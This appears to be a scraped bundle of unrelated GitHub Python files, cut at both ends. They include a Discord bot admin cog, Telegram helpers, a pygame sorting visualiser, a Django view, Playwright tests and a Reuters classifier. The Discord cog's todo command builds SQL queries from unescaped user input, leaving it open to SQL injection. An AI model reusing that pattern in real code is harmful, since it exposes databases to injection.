statas(self, ctx, *args):\n mem = psutil.virtual_memory()\n\n temb = discord.Embed(title=f\" {self.bytes2human(mem.used)}/{self.bytes2human(mem.total)} ({round(mem.used/mem.total*100)}%)\", colour = discord.Colour(0xB1F1FA))\n\n await ctx.send(embed=temb)\n\n @commands.command(hidden=True)\n @checks.check_author()\n async def sql(self, ctx, *, query):\n\n query = self.utils.cleanup_code(query)\n\n #is_multistatement = query.count(';') > 1\n #if is_multistatement:\n # # fetch does not support multiple statements\n # strategy = self.client._cursor.fetchall\n #else:\n strategy = self.client._cursor.fetchall()\n\n try:\n if not await self.client._cursor.execute(query): await ctx.send(\":x: No effect\")\n except mysqlError.ProgrammingError: await ctx.send(\":x: Invalid syntax!\"); return\n # try:\n # results = await strategy()\n # except Exception as e:\n # return await ctx.send(f'```py\\n{format.format_exception(e)}\\n```')\n\n #headers = list(results[0].keys())\n try: col = len(results[0])\n except TypeError: await ctx.send(':x:'); return\n\n table = format.TabularData()\n table.set_columns(['-']*col)\n table.add_rows(list(r) for r in results)\n render = table.render()\n\n fmt = f'```\\n{render}\\n```'\n if len(fmt) > 2000:\n fp = BytesIO(fmt.encode('utf-8'))\n await ctx.send('Too many results...', file=discord.File(fp, 'results.txt'))\n else:\n await ctx.send(fmt)\n\n @commands.command()\n @checks.check_author()\n async def get_imgur(self, ctx, *args):\n if args:\n if '.png' not in args[0] or '.jpg' not in args[0] or '.jpeg' not in args[0] or '.gif' not in args[0]:\n await ctx.send(f\"<:osit:544356212846886924> {ctx.message.author.mention}, invalid link!\"); return\n else: source = args[0]\n else:\n package = ctx.message.attachments\n if package: source = package[0]['proxy_url']\n else: return\n\n resp = await self.client.loop.run_in_executor(None, self.client.thp.imgur_client.upload_from_url, source)\n reembed = discord.Embed(description=f\"{resp['link']}\", colour = discord.Colour(0x011C3A))\n reembed.set_image(url=resp['link'])\n await ctx.send(embed=reembed)\n\n @commands.command()\n @checks.check_author()\n async def todo(self, ctx, *args):\n if not args:\n bundle = await self.client.quefe(\"SELECT taime, content, id FROM tz_todo\", type='all')\n line = '\\n'\n\n try:\n for pack in bundle:\n line = line + f\"**━{pack[2]}━━━━━{pack[0]}━━━**\\n{pack[1]}\\n\"\n except TypeError:\n line = line + f\"**━{bundle[2]}━━━━━{bundle[0]}━━━**\\n{bundle[1]}\\n\"\n\n reembed = discord.Embed(description=line, color=discord.Colour(0xB1F1FA))\n await ctx.send(embed=reembed, delete_after=20); return\n\n if args[0] in ['create', 'add', 'make']:\n content = ' '.join(args[1:])\n create_point = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n await self.client._cursor.execute(f\"INSERT INTO tz_todo VALUES (0, '{content}', '{create_point}')\")\n await ctx.send(\":white_check_mark: Done\"); return\n elif args[0] == 'delete':\n try: \n if await self.client._cursor.execute(f\"DELETE FROM tz_todo WHERE id='{args[1]}';\") == 0:\n await ctx.send(\"Id not found\"); return\n except IndexError: await ctx.send(\"Hey you, I need an id.\"); return\n await ctx.send(f\"Deleted todo `{args[1]}`\")\n\n @commands.command()\n @checks.check_author()\n async def delele(self, ctx, *args):\n \"\"\"Delete message\"\"\"\n try:\n msg = await ctx.channel.fetch_message(int(args[0]))\n await msg.delete()\n # E: Invalid args\n except ValueError: await ctx.send(\":warning: Invalid **`message id`**\"); return\n # E: Msg not found\n except discordErrors.NotFound: await ctx.send(\":warning: Message not found!\"); return\n # E: No permission\n except discordErrors.Forbidden: await ctx.send(\"No you can't <:fufu:508437298808094742>\"); return\n\n @commands.command()\n @checks.check_author()\n @commands.cooldown(1, 5, type=BucketType.guild)\n async def countline(self, ctx, *args):\n # dir_main = os.path.dirname(os.path.realpath(__file__))\n dirs = ['cogs', 'data']\n length = 0\n len_img = 0\n\n async def walkthrough(dir_path, pack, prev=''):\n \"\"\"\n length, len_img = pack\n \"\"\"\n dir_path = os.path.join(prev, dir_path)\n for f in os.listdir(dir_path):\n await asyncio.sleep(0)\n if '.' not in f and f not in dirs:\n pack = await walkthrough(f, pack, prev=dir_path)\n\n if f.endswith(\".py\"):\n with open(os.path.join(dir_path, f), 'r', encoding=\"utf8\") as b:\n lines = b.readlines()\n pack[0] += len(lines)\n elif f.endswith('.png') or f.endswith('.jpg'):\n pack[1] += 1\n else:\n continue\n return pack\n\n for dir_path in dirs:\n pack = await walkthrough(dir_path, [length, len_img])\n length, len_img = tuple(pack)\n\n await ctx.send(f\"> **`{length}` lines** of code\\n> **`{len_img}`** image files!\")\n\n @commands.command()\n @checks.check_author()\n async def command_info(self, ctx, *args):\n try:\n await ctx.send(\"> Located in `{}`\".format(self.client.get_command(args[0]).cog.qualified_name))\n except IndexError: await ctx.send(\":x: Missing command's name\"); return\n except AttributeError: await ctx.send(\":x: Command not found!\"); return\n\n\n\n # ================== TOOLS ==================\n\n def bytes2human(self, n):\n # http://code.activestate.com/recipes/578019\n # >>> bytes2human(10000)\n # '9.8K'\n # >>> bytes2human(100001221)\n # '95.4M'\n symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')\n prefix = {}\n for i, s in enumerate(symbols):\n prefix[s] = 1 << (i + 1) * 10\n for s in reversed(symbols):\n if n >= prefix[s]:\n value = float(n) / prefix[s]\n return '%.1f%s' % (value, s)\n return \"%sB\" % n\n\n def data_updating(self, update_kw):\n if update_kw == 'time_pack':\n time_pack = (self.client.STONE.year, self.client.STONE.month, self.client.STONE.day, self.client.STONE.hour, self.client.STONE.minute)\n with open('data/time.json', 'w') as f:\n json.dump(time_pack, f, indent=4)\n\n\n\n\n\n\ndef setup(client):\n client.add_cog(avaAdmin(client))\n","repo_name":"kaleidocli/bot_cli","sub_path":"cogs/avasoul_pack/avaAdmin.py","file_name":"avaAdmin.py","file_ext":"py","file_size_in_byte":21782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13282209479","text":"import os\nimport random\nimport asyncio\nfrom datetime import datetime, timezone, timedelta\n\n\nclass Apps:\n def __init__(self):\n self.data_path = 'data'\n\n def current_date(self, time_format='%Y-%m-%d %H:%M:%S'): # Текущее время и дата по Москве (Часовой пояс +3)\n offset = timezone(timedelta(hours=3))\n date = datetime.now(offset).strftime(time_format) # time_format('%Y-%m-%d %H:%M:%S')\n return date\n\n def make_folder(self, directory): # Создать папку если она отсутствует в рабочей папке\n os.makedirs(directory, exist_ok=True)\n\n async def send_chat_action(self, bot, chat_id, action='typing', sec=1, text=None): # Уведомление Chat_Action\n await bot.send_chat_action(chat_id, action)\n # action typing/choose_sticker/record_audio/upload_document/upload_photo\n if text is not None:\n if len(text) < 15:\n sec = 1\n elif 15 <= len(text) < 25:\n sec = 2\n elif 25 <= len(text) < 35:\n sec = 3\n elif 35 <= len(text) < 45:\n sec = 4\n else:\n sec = 5\n await asyncio.sleep(sec)\n\n async def send_notification(self, bot, message, chat_id, action):\n # type = reply_message/new_user/new_group/no_time/...\n user_id = str(message.from_user.id)\n username = str(message.from_user.username)\n try:\n full_name = str(f'{message.from_user.first_name} {message.from_user.last_name}')\n except TypeError:\n full_name = str(message.from_user.first_name)\n group_id = str(message.chat.id)[1:]\n group_title = str(message.chat.title)\n message_id = str(message.message_id)\n text = str(message.text)\n notifications = {\n 'reply_message': 'Новое reply сообщение:\\n'\n f'id {group_id} - \"{group_title}\")\\n'\n f'id {user_id} - {full_name} ({username})\\n'\n f'message_id {message_id} - {text}',\n 'new_user': 'Новый пользователь:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'new_group': 'Новая группа:\\n'\n f'id {group_id} - \"{group_title}\")',\n 'no_time': 'У пользователя кончилось время:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'new_vpn_user': 'Появился новый пользователь VPN:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'vpn_user_deleted': 'Пользователь заблокировал свой VPN:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'user_blocked_bot': 'Бот заблокирован следующим пользователем:\\n'\n f'id {user_id} - {full_name} ({username})'\n }\n if action in notifications:\n await bot.send_message(chat_id, notifications[action])\n\n async def echo_voice(self, bot, message, txt_file): # Отправляет случайное сообщение из answers_NAME.tx\n with open(f'{self.data_path}/{txt_file}.txt', 'r') as f:\n lines = f.readlines()\n if random.uniform(0, 1) < 0.25:\n text = random.choice(lines)\n await Apps().send_chat_action(bot, chat_id=message.chat.id, text=text) # Уведомление Chat_Action\n await bot.send_message(message.chat.id, text)\n else:\n return None\n","repo_name":"DrGsan/Audio_DrGBot","sub_path":"apps/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24262267712","text":"import pandas as pd\nfrom dataset.models import pincode\n\ndf = pd.read_csv('pincode1.csv', encoding='utf8', sep=',')\ncount = 0\nfor row in df.itertuples():\n print(count)\n count = count + 1\n obj = pincode.objects.create(pinc=row.pincode, place=row.taluk, district=row.districtname, state=row.statename,\n region=row.regionname, division=row.divisionname)\n","repo_name":"Nandy-Saran/weather-forecast","sub_path":"dataset/setup1.py","file_name":"setup1.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22792890096","text":"import pygame\nfrom random import randint\n\ngap = 10 #竖条的间隔\nwidth = 30 #竖条的宽度\nscreenSize = (600, 250) #显示屏幕的尺寸\nbarXPosition = [] #竖条在坐标轴的位置\nBars = [] #竖条对象列表\n\n#生成颜色\nclass color(object):\n @staticmethod\n def RandomColor():\n r,g,b = randint(0,225),randint(0,255),randint(0,255)\n return (r,g,b)\n @staticmethod\n def CalculateColor(self,num):\n pass\n\nclass bar(object):\n def __init__(self, n,num,screen,width = 30):\n self.n = n\n self.locationX = barXPosition[n]\n self.locationY = screenSize[1]-50-num\n self.num = num\n self.color = color.RandomColor()\n self.width = width\n self.font = pygame.font.Font(None, 20)\n self.screen = screen\n\n #绘制竖条及其上方的数字\n def BarDraw(self):\n pygame.draw.rect(self.screen, self.color,\n ((self.locationX,self.locationY), (self.width, self.num)))\n self.txt = self.font.render(\"{}\".format(self.num), True, self.color)\n self.screen.blit(self.txt, (self.locationX+5,self.locationY-20))\n\n #移动竖条,flag是用于判断移动方向 True向右 False向左\n def move(self,flag):\n pace = 2 #移动的步长\n #消除移动前的竖条\n pygame.draw.rect(self.screen, (255, 255, 235),\n ((self.locationX, self.locationY), (self.width, self.num)))\n if flag:\n self.locationX += pace\n else:\n self.locationX -= pace\n # 绘制移动后的竖条\n pygame.draw.rect(self.screen, self.color,\n ((self.locationX , self.locationY), (self.width, self.num)))\n\n #交换相邻两个竖条\n def ChangeLocation(self,otherBall):\n #清除当前位置图像与文字\n pygame.draw.rect(self.screen, (255, 255, 235),\n ((self.locationX, self.locationY-20), (self.width, self.num+20)))\n pygame.draw.rect(otherBall.screen, (255, 255, 235),\n ((otherBall.locationX, otherBall.locationY - 20), (otherBall.width, otherBall.num + 20)))\n #竖条移动的动画\n for n in range(20):\n self.move(True)\n otherBall.move(False)\n pygame.time.delay(40)\n pygame.display.flip()\n\n #移动后,重新写上竖条对应的数字\n self.screen.blit(self.txt, (self.locationX + 5, self.locationY - 20))\n otherBall.screen.blit(otherBall.txt, (otherBall.locationX + 5, otherBall.locationY - 20))\n\n #交换竖条对象在列表的位置,同时交换排位数字\n Bars[self.n],Bars[otherBall.n] = Bars[otherBall.n],Bars[self.n]\n self.n,otherBall.n = otherBall.n,self.n\n pygame.display.flip()\n pygame.time.delay(200) #此延时控制排序动画的快慢\n\n#冒泡排序\ndef algorithm(nums):\n for i in range(len(nums) - 1):\n for j in range(len(nums) - 1 - i):\n if nums[j] > nums[j + 1]:\n Bars[j].ChangeLocation(Bars[j + 1])\n nums[j], nums[j + 1] = nums[j + 1], nums[j]\n\n#计算十二个竖条在轴上的位置\ndef barX(gap,width,barXs):\n for n in range(12):\n barX = 50 + gap + (gap + width) * n\n barXs.append(barX)\n\ndef main():\n nums = []\n pygame.init()\n screen = pygame.display.set_mode(screenSize)\n pygame.display.set_caption(\"算法\") #标题\n screen.fill((255, 255, 235)) #背景色\n barX(gap,width,barXPosition) #计算bar位置并存于barXs\n pygame.draw.aaline(screen,(0,255,0),(50,screenSize[1]-50),\n (screenSize[0]-50,screenSize[1]-50)) #绘制坐标轴\n pygame.display.flip()\n #生成十二个竖条并绘制\n for n in range(12):\n num = randint(20,160)\n tempBar = bar(n,num,screen)\n tempBar.BarDraw()\n nums.append(num)\n Bars.append(tempBar)\n pygame.time.delay(50) #此处延时是为了开始时演示动画效果\n pygame.display.flip()\n\n algorithm(nums) #排序\n\n #等待关闭窗口事件\n run = True\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\nif __name__ == \"__main__\":\n main()","repo_name":"zetaleee/Visualization-algorithm","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"72731197559","text":"import cv2\nimport numpy as np\n\n\ndef show_image():\n while True:\n img = cv2.imread(\"color.png\")\n cv2.imshow('Estudo OpenCV- Filtro', img)\n ret = cv2.waitKey(1)\n if ret == 27:\n break\n elif ret == -1:\n continue\n\n\ncv2.destroyAllWindows()\n\n\ndef main():\n show_image()\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"BillyDeKidII/BrincandoComCodigos","sub_path":"Python/TonsImage/filtro1.py","file_name":"filtro1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70950505079","text":"from ant_colony.graph import Node, Graph\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.context('ggplot2')\n\nfrom math import radians, cos, sin, asin, sqrt\n\n\ndef haversine(lat1, lon1, lat2, lon2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n \"\"\" \n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees) \n \"\"\"\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine公式\n dlon = abs(lon2 - lon1)\n dlat = abs(lat2 - lat1)\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r\n\n\ndf = pd.read_csv(r'D:\\ProgramFiles\\PycharmProjects\\learnpy\\learnscrapy\\week9\\burma14.csv')\n\nfig1 = plt.figure()\nsc = plt.scatter(df['x'], df['y'])\ni = -1\nfor x, y in zip(df['x'], df['y']):\n i += 1\n plt.annotate(\n '({0})'.format(i),\n xy=(x, y),\n xytext=(0, -5),\n textcoords='offset points',\n xycoords='data',\n ha='center',\n va='top')\nnodes = [Node(z.x, z.y) for z in df.itertuples()]\ngraph = Graph(nodes, alpha=1, beta=5, decay=0.2)\n# path, distance = graph.find_shortest_path(n=1, m=28)\nd_list = []\nn_list = list(range(0, 1001, 10))\nshortest = 100000\nfor n in n_list:\n path, distance = graph.find_shortest_path(n=n, m=21)\n if distance < shortest:\n shortest = distance\n path_shortest = path\n d_list.append(distance)\nfig2 = plt.figure()\nplt.plot(n_list, d_list, 'r-')\n\nsum = 0\nfor i in range(len(path_shortest) - 1):\n x1, y1 = df.loc[path_shortest[i]]\n x2, y2 = df.loc[path_shortest[i + 1]]\n real_dis = haversine(x1, y1, x2, y2)\n sum += real_dis\nx0, y0 = df.loc[path_shortest[0]]\nxn, yn = df.loc[path_shortest[-1]]\nsum += haversine(x0, y0, xn, yn)\n\n","repo_name":"kinger310/learnpy","sub_path":"learn_model/learn_ant.py","file_name":"learn_ant.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"28618211453","text":"class Solution:\n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n \n @lru_cache(None)\n def count(i,m_left,n_left):\n if i >= len(strs) or m_left < 0 or n_left < 0:\n return 0\n \n size = len(strs[i])\n zeroes = strs[i].count('0')\n ones = size - zeroes\n \n if m_left - zeroes < 0 or n_left - ones < 0:\n return count(i+1,m_left,n_left)\n \n return max(count(i+1,m_left,n_left),1 + count(i+1,m_left-zeroes,n_left-ones))\n \n \n return count(0,m,n)","repo_name":"amanuel1271/Problem-Solving","sub_path":"474-ones-and-zeroes/474-ones-and-zeroes.py","file_name":"474-ones-and-zeroes.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16810609942","text":"\"\"\"\nA view representing an instance of a point of interest. POIs can be created or updated via this view.\n\"\"\"\nimport logging\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.shortcuts import render, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import TemplateView\n\nfrom ...constants import status\nfrom ...decorators import region_permission_required\nfrom ...forms.pois import POIForm, POITranslationForm\nfrom ...models import POI, POITranslation, Region, Language\n\nlogger = logging.getLogger(__name__)\n\n\n@method_decorator(login_required, name='dispatch')\n@method_decorator(region_permission_required, name='dispatch')\nclass POIView(PermissionRequiredMixin, TemplateView):\n permission_required = 'cms.manage_pois'\n raise_exception = True\n\n template_name = 'pois/poi_form.html'\n base_context = {'current_menu_item': 'pois'}\n\n def get(self, request, *args, **kwargs):\n\n region = Region.objects.get(slug=kwargs.get('region_slug'))\n language = Language.objects.get(code=kwargs.get('language_code'))\n\n # get poi and translation objects if they exist\n poi = POI.objects.filter(id=kwargs.get('poi_id')).first()\n poi_translation = POITranslation.objects.filter(\n poi=poi,\n language=language,\n ).first()\n\n if poi and poi.archived:\n messages.warning(request, _(\"You cannot edit this POI because it is archived.\"))\n\n poi_form = POIForm(instance=poi)\n poi_translation_form = POITranslationForm(instance=poi_translation)\n\n return render(request, self.template_name, {\n **self.base_context,\n 'poi_form': poi_form,\n 'poi_translation_form': poi_translation_form,\n 'language': language,\n # Languages for tab view\n 'languages': region.languages if poi else [language],\n })\n\n # pylint: disable=too-many-branches,too-many-locals,unused-argument\n def post(self, request, *args, **kwargs):\n\n region = Region.objects.get(slug=kwargs.get('region_slug'))\n language = Language.objects.get(code=kwargs.get('language_code'))\n\n poi_instance = POI.objects.filter(id=kwargs.get('poi_id')).first()\n poi_translation_instance = POITranslation.objects.filter(\n poi=poi_instance,\n language=language,\n ).first()\n\n if poi_instance and poi_instance.archived:\n return redirect('edit_poi', **{\n 'poi_id': poi_instance.id,\n 'region_slug': region.slug,\n 'language_code': language.code,\n })\n\n poi_form = POIForm(\n request.POST,\n instance=poi_instance,\n )\n poi_translation_form = POITranslationForm(\n request.POST,\n instance=poi_translation_instance,\n region=region,\n language=language,\n )\n\n if (\n not poi_form.is_valid() or\n not poi_translation_form.is_valid()\n ):\n\n # Add error messages\n for form in [poi_form, poi_translation_form]:\n for field in form:\n for error in field.errors:\n messages.error(request, _(field.label) + ': ' + _(error))\n for error in form.non_field_errors():\n messages.error(request, _(error))\n\n elif (\n not poi_form.has_changed() and\n not poi_translation_form.has_changed()\n ):\n\n messages.info(request, _('No changes detected.'))\n\n else:\n\n poi = poi_form.save(region=region)\n poi_translation_form.save(poi=poi, user=request.user)\n\n published = poi_translation_form.instance.status == status.PUBLIC\n if not poi_instance:\n if published:\n messages.success(request, _('POI was successfully created and published.'))\n else:\n messages.success(request, _('POI was successfully created.'))\n return redirect('edit_poi', **{\n 'poi_id': poi.id,\n 'region_slug': region.slug,\n 'language_code': language.code,\n })\n if published:\n messages.success(request, _('POI was successfully published.'))\n else:\n messages.success(request, _('POI was successfully saved.'))\n\n return render(request, self.template_name, {\n **self.base_context,\n 'poi_form': poi_form,\n 'poi_translation_form': poi_translation_form,\n 'language': language,\n # Languages for tab view\n 'languages': region.languages if poi_instance else [language],\n })\n","repo_name":"digitalfabrik/coldaid-backend","sub_path":"src/cms/views/pois/poi_view.py","file_name":"poi_view.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"17383835340","text":"try:\n from win32api import GetAsyncKeyState as getState\nexcept ModuleNotFoundError:\n raise Exception(\"You do not have pywin32 installed. Get it from: https://github.com/mhammond/pywin32/releases\")\n\nkey = { #keycodes from the MSDN\n \"TAB\": 9,\n \"ENTER\": 13,\n \"SHIFT\": 16,\n \"CONTROL\": 17,\n \"ALT\": 18,\n \"ESCAPE\": 27,\n \"SPACE\": 32,\n \"LEFT\": 37,\n \"UP\": 38,\n \"RIGHT\": 39,\n \"DOWN\": 40\n}\n\nfor k in range(65,90): #getting key codes for letter keys\n key[chr(k)] = k\n\nfor k in range(48,57): #getting key codes for number keys\n key[chr(k)] = k\n\ndef isPressed(keycode): #simple async keyboard polling function\n return False if getState(keycode) == 0 else True","repo_name":"underscoren/pyCaster","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19856671705","text":"from playwright.sync_api import Playwright, Page, Route, sync_playwright, expect\nfrom datetime import datetime\nimport os\n\ncurrent_date = datetime.now(tz=None)\ncur_time = current_date.strftime('%m-%d-%Y_%H-%M-%S')\n\n\ndef screenshot(page: Page):\n page.screenshot(path=f\"Screenshots/screenshot_{cur_time}.png\")\n\n\ndef test_add_todo(playwright: Playwright) -> None:\n browser = playwright.chromium.launch(headless=False)\n context = browser.new_context()\n page = context.new_page()\n page.goto(\"https://playwright-todomvc.antonzimaiev.repl.co/#/\")\n page.get_by_placeholder(\"What needs to be done?\").click()\n page.get_by_placeholder(\"What needs to be done?\").fill(\"Создать первый сценарий playwright\")\n page.get_by_placeholder(\"What needs to be done?\").press(\"Enter\")\n\n context.close()\n browser.close()\n\n\ndef test_checkbox(page: Page):\n page.goto('https://checks-radios.antonzimaiev.repl.co/')\n page.locator(\"text=Default checkbox\").check()\n page.locator(\"text=Checked checkbox\").check()\n page.locator(\"text=Default radio\").check()\n page.locator(\"text=Default checked radio\").check()\n page.locator(\"text=Checked switch checkbox input\").check()\n screenshot(page)\n\n\ndef test_select(page: Page):\n page.goto('https://select.antonzimaiev.repl.co/')\n page.select_option('#floatingSelect', value=\"3\")\n page.select_option('#floatingSelect', index=1)\n page.select_option('#floatingSelect', label=\"Нашел и завел bug\")\n screenshot(page)\n\n\ndef test_select_multiple(page: Page):\n page.goto('https://select.antonzimaiev.repl.co/')\n page.select_option('#skills', value=[\"playwright\", \"python\"])\n screenshot(page)\n\n\ndef test_select_multiple_file(page: Page):\n page.goto('https://upload.antonzimaiev.repl.co/')\n page.set_input_files(\"#formFile\", \"test.txt\")\n screenshot(page)\n page.locator(\"#file-submit\").click()\n\n\ndef test_drag_and_drop(page: Page):\n page.goto('https://draganddrop.antonzimaiev.repl.co/')\n page.drag_and_drop(\"#drag\", \"#drop\")\n screenshot(page)\n\n\ndef test_dialogs(page: Page):\n page.goto(\"https://dialog.antonzimaiev.repl.co/\")\n page.on(\"dialog\", lambda dialog: dialog.accept())\n page.get_by_text(\"Диалог Confirmation\").click()\n screenshot(page)\n\n\ndef test_download(page: Page):\n\n page.goto(\"https://demoqa.com/upload-download\")\n\n with page.expect_download() as download_info:\n page.locator(\"a:has-text(\\\"Download\\\")\").click()\n\n download = download_info.value\n file_name = download.suggested_filename\n destination_folder_path = \"./Download/\"\n download.save_as(os.path.join(destination_folder_path, file_name))\n\n\ndef test_inner_text(page: Page):\n page.goto('https://table.antonzimaiev.repl.co/')\n row = page.locator(\"tr\")\n print(row.all_inner_texts())\n\n\ndef test_text_content(page: Page):\n page.goto('https://table.antonzimaiev.repl.co/')\n row = page.locator(\"tr\")\n print(row.all_text_contents())\n\n\ndef test_new_tab(page: Page):\n page.goto(\"https://tabs.antonzimaiev.repl.co/\")\n with page.context.expect_page() as tab:\n page.get_by_text(\"Переход к Dashboard\").click()\n\n screenshot(page)\n new_tab = tab.value\n page.pause()\n assert new_tab.url == \"https://tabs.antonzimaiev.repl.co/dashboard/index.html?\"\n sign_out = new_tab.locator('.nav-link', has_text='Sign out')\n screenshot(page)\n assert sign_out.is_visible()\n\n\ndef test_todo(page: Page):\n page.goto('https://demo.playwright.dev/todomvc/#/')\n expect(page).to_have_url(\"https://demo.playwright.dev/todomvc/#/\")\n input_field = page.get_by_placeholder('What needs to be done?')\n expect(input_field).to_be_empty()\n input_field.fill(\"Закончить курс по playwright\")\n input_field.press('Enter')\n input_field.fill(\"Добавить в резюме, что умею автоматизировать\")\n input_field.press('Enter')\n todo_item = page.get_by_test_id('todo-item')\n expect(todo_item).to_have_count(2)\n todo_item.get_by_role('checkbox').nth(0).click()\n expect(todo_item.nth(0)).to_have_class('completed')\n\n\ndef test_listen_network(page: Page):\n page.on(\"request\", lambda request: print(\">>\", request.method, request.url))\n page.on(\"response\", lambda response: print(\"<<\", response.status, response.url))\n page.goto('https://osinit.ru/')\n\n\ndef test_network(page: Page):\n page.route(\"**/register\", lambda route: route.continue_(post_data='{\"email\": \"user\",\"password\": \"secret\"}'))\n page.goto('https://reqres.in/')\n page.get_by_text(' Register - successful ').click()\n\n\ndef test_mock_tags(page: Page):\n page.route(\"**/api/tags\", lambda route: route.fulfill(path=\"data.json\"))\n page.goto('https://demo.realworld.io/')\n\n\ndef test_intercepted(page: Page):\n def handle_route(route: Route):\n response = route.fetch()\n json = response.json()\n json[\"tags\"] = [\"open\", \"solutions\"]\n route.fulfill(json=json)\n\n page.route(\"**/api/tags\", handle_route)\n\n page.goto(\"https://demo.realworld.io/\")\n sidebar = page.locator('css=div.sidebar')\n expect(sidebar.get_by_role('link')).to_contain_text([\"open\", \"solutions\"])\n\n\ndef test_inventory(page):\n response = page.request.get('https://petstore.swagger.io/v2/store/inventory')\n print(response.status)\n print(response.json())\n\n\ndef test_add_user(page):\n data = [\n {\n \"id\": 9743,\n \"username\": \"fsd\",\n \"firstName\": \"fff\",\n \"lastName\": \"ggg\",\n \"email\": \"bbb\",\n \"password\": \"tt\",\n \"phone\": \"333\",\n \"userStatus\": 0\n }\n ]\n header = {\n 'accept': 'application/json',\n 'content-Type': 'application/json'\n }\n response = page.request.post('https://petstore.swagger.io/v2/user/createWithArray', data=data, headers=header)\n print(response.status)\n print(response.json())\n\n","repo_name":"SergeiKychakov/playwright_autotest","sub_path":"test_todo.py","file_name":"test_todo.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69942314362","text":"\"\"\"\nTitle: Text Categorization with kNN\n\nProject: CSI4107 Project\nVersion: Final System\nComponent: Module 6\n\nCreated: 10 Apr 2020\nLast modified: 13 Apr 2020\n\nAuthor: Tiffany Maynard\nStatus: In Progress\n\nDescription: Assign one or more topics to the Reuters documents that are not assigned any\ntopics\nBased on https://miguelmalvarez.com/2015/03/20/classifying-reuters-21578-collection-with-python-representing-the-data/\n\"\"\"\nimport csv\nimport os\nimport ast\nfrom nltk import word_tokenize\nfrom nltk.stem.porter import PorterStemmer\nimport re\nfrom nltk.corpus import stopwords, reuters\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.neighbors import KNeighborsClassifier\nimport bs4\nimport config\n#Empty globals to store topics so it is only read once from csv\nTOPIC_DICT = {}\n\n\ndef doc_id_by_topic():\n \"\"\"create a dictionary of topics to list doc_ids by going through reuters corpus\"\"\"\n\n corpus_filename = config.CORPUS[config.REUTERS]['corpusxml']\n topic_dict = dict()\n all_doc_ids = []\n with open(corpus_filename, 'rb') as f:\n data = f.read()\n soup = bs4.BeautifulSoup(data, 'html.parser')\n articles = soup.findAll(\"article\")\n for article in articles:\n doc_id = article.find(\"doc_id\").text\n all_doc_ids.append(doc_id)\n topics = article.find(\"topics\").text.strip().split(' ')\n #some articles have multiple topics\n for topic in topics:\n if topic in topic_dict:\n doc_list = topic_dict.get(topic)\n doc_list.append(doc_id)\n topic_dict[topic] = doc_list\n else:\n topic_dict[topic] = [doc_id]\n topic_dict['all-topics'] = list(set(all_doc_ids))\n topic_dict['notopic'] = topic_dict.pop('')\n write_topics_tocsv(topic_dict)\n\ndef write_topics_tocsv(topics):\n \"\"\"write the topic file to csv\"\"\"\n csv_filename = config.CORPUS[config.REUTERS]['doc_by_topic']\n with open(csv_filename, 'w') as file:\n writer = csv.writer(file)\n for key, value in topics.items():\n writer.writerow([key, value])\n\ndef read_topics_from_csv():\n \"\"\"Read in the csv file that stores the topic info for a corpus\"\"\"\n filename = config.CORPUS[config.REUTERS]['doc_by_topic']\n topic_dict = dict()\n if os.path.exists(filename):\n print('reading from topics csv')\n with open(filename, newline='') as data_file:\n reader = csv.reader(data_file)\n for row in reader:\n topic_dict[row[0]] = ast.literal_eval(row[1])\n return topic_dict\n\n return {}\n\ndef get_topic_dict():\n \"\"\"Wrapper to avoid multiple dictionary reads from csv.\"\"\"\n global TOPIC_DICT\n if TOPIC_DICT:\n return TOPIC_DICT\n TOPIC_DICT = read_topics_from_csv()\n return TOPIC_DICT\n\ncachedStopWords = stopwords.words(\"english\")\n\n#code below is from\n#https://miguelmalvarez.com/2015/03/20/classifying-reuters-21578-collection-with-python-representing-the-data/\ndef tokenize(text):\n\tmin_length = 3\n\twords = map(lambda word: word.lower(), word_tokenize(text))\n\twords = [word for word in words\n if word not in cachedStopWords]\n\ttokens =(list(map(lambda token: 